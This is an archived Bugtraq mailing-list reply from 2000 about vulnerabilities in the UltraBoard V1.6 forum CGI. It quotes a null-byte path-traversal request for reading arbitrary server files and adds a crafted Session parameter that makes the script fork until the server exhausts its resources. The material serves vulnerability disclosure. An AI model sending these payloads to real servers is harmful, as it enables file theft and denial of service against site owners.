Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Re: Fun with UltraBoard V1.6X
From: jmbello () ITCHY COVERLINK ES (Juan M. Bello Rivas)
Date: Fri, 5 May 2000 23:10:56 +0200

Hola,

On Wed, May 03, 2000 at 02:13:16AM -0700, rudi carell wrote:

found some interesting things in the "old" UltraBoard-Forum scripts
(UltraBoard V 1.6)

class:Input Validation Error
remote:Yes
vulnerable:UltraBoard V1.*
vendor: www.ultrascripts.com || www.ub2k.com

Description:
By using the good old NullByte(\000) its possible to open "any" file on the
webserver(with its permissions) running the "UltraBoard" forum-software.

cgi-script:
UltraBoard.pl || UltraBoard.cgi

Variables:
Action=PrintableTopic
Post=[path_including_".."_to_any_file][***NULLBYTE***]
Board=[valid_board]
Idle=10
Sort=0
Order=Descend
Page=0
Session=


        There's even more fun availiable with old versions of ultraboard
(and I think the latest beta of ultraboard 2000 is also vulnerable to this).
        You can bring the web server to its knees by issuing a request to
the CGI like this:

        QUERY_STRING=Session=../UltraBoard.pl%00%7c

        It will start forking instances of the CGI until it eats all the
resources of the machine.

Later.

Juan M. Bello Rivas

--
"Let's suppose you just finished writing `zardoz',
 a program to make your head float from vortex to vortex."
                        From GNU automake documentation.

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]